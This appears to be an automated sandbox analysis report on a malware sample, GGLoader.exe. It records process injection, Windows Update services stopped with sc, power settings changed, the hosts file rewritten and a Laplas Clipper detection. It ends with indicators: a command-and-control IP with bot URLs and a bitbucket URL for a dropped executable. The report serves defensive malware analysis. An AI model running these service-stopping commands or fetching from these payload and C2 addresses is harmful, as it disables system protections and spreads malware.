Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_0000000140001C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 42_2_0000000140001C64
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007A5A60 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 6_2_007A5A60
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007946E0 SHGetFolderPathA,GetModuleFileNameA,GetComputerNameA,GetUserNameA, 6_2_007946E0
Source: C:\Windows\System32\dialer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Modifies power options to not sleep / hibernate
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Modifies the hosts file
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Stops critical windows services
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop dosvc

Stealing of Sensitive Information
barindex
Yara detected Laplas Clipper
Source: Yara match File source: 00000023.00000002.2992259011.0000000000B4A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: svcupdater.exe PID: 7904, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1526110 Sample: GGLoader.exe Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 84 bitbucket.org 2->84 90 Suricata IDS alerts for network traffic 2->90 92 Found malware configuration 2->92 94 Antivirus detection for dropped file 2->94 96 25 other signatures 2->96 10 GGLoader.exe 2 2->10         started        14 powershell.exe 2->14         started        16 cmd.exe 2->16         started        18 5 other processes 2->18 signatures3 process4 dnsIp5 74 C:\Users\user\AppData\...behaviorgraphGLoader.exe.log, CSV 10->74 dropped 112 Encrypted powershell cmdline option found 10->112 114 Binary or sample is protected by dotNetProtector 10->114 116 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 10->116 21 powershell.exe 14 27 10->21         started        118 Writes to foreign memory regions 14->118 120 Modifies the context of a thread in another process (thread injection) 14->120 122 Injects a PE file into a foreign processes 14->122 26 dllhost.exe 14->26         started        28 conhost.exe 14->28         started        124 Uses cmd line tools excessively to alter registry or file data 16->124 126 Uses powercfg.exe to modify the power settings 16->126 128 Stops critical windows services 16->128 30 conhost.exe 16->30         started        38 10 other processes 16->38 86 45.159.189.105, 49739, 49740, 50007 HOSTING-SOLUTIONSUS Netherlands 18->86 130 Antivirus detection for dropped file 18->130 132 Loading BitLocker PowerShell Module 18->132 134 Modifies power options to not sleep / hibernate 18->134 32 conhost.exe 18->32         started        34 conhost.exe 18->34         started        36 conhost.exe 18->36         started        40 5 other processes 18->40 file6 signatures7 process8 dnsIp9 88 bitbucket.org 185.166.143.49, 443, 49730, 49731 AMAZON-02US Germany 21->88 68 C:\Users\user\AppData\...\LicenseGet.exe, PE32 21->68 dropped 70 C:\Users\user\AppData\Local\...\LicSend.exe, PE32+ 21->70 dropped 72 C:\Users\user\AppData\Local\...\LicCheck.exe, PE32 21->72 dropped 98 Potential dropper URLs found in powershell memory 21->98 100 Loading BitLocker PowerShell Module 21->100 102 Powershell drops PE file 21->102 42 LicSend.exe 2 21->42         started        46 LicCheck.exe 3 21->46         started        48 powershell.exe 15 21->48         started        50 conhost.exe 21->50         started        104 Found stalling execution ending in API Sleep call 26->104 106 Injects code into the Windows Explorer (explorer.exe) 26->106 108 Contains functionality to inject code into remote processes 26->108 110 4 other signatures 26->110 52 winlogon.exe 26->52 injected 54 lsass.exe 26->54 injected 56 svchost.exe 26->56 injected 58 12 other processes 26->58 file10 signatures11 process12 file13 76 C:\Users\user\AppData\Local\...\poduiwcd.tmp, PE32+ 42->76 dropped 78 C:\Program Filesbehaviorgraphoogle\Chrome\updater.exe, PE32+ 42->78 dropped 80 C:\Windows\System32\drivers\etc\hosts, ASCII 42->80 dropped 136 Antivirus detection for dropped file 42->136 138 Multi AV Scanner detection for dropped file 42->138 140 Suspicious powershell command line found 42->140 148 7 other signatures 42->148 60 dialer.exe 42->60         started        82 C:\Users\user\AppData\...\svcupdater.exe, PE32 46->82 dropped 142 Machine Learning detection for dropped file 46->142 144 Uses schtasks.exe or at.exe to add and modify task schedules 46->144 146 Drops large PE files 46->146 62 schtasks.exe 46->62         started        64 conhost.exe 48->64         started        signatures14 process15 process16 66 conhost.exe 62->66         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.159.189.105
 unknown Netherlands
14576 HOSTING-SOLUTIONSUS true
185.166.143.49
 bitbucket.org Germany
16509 AMAZON-02US true

Contacted Domains

Name IP Active
bitbucket.org 185.166.143.49 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://45.159.189.105/bot/online?guid=724471\\user&key=5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e true
    		unknown
    https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/Devmin.exe true
      		unknown
      http://45.159.189.105/bot/regex true
        		unknown
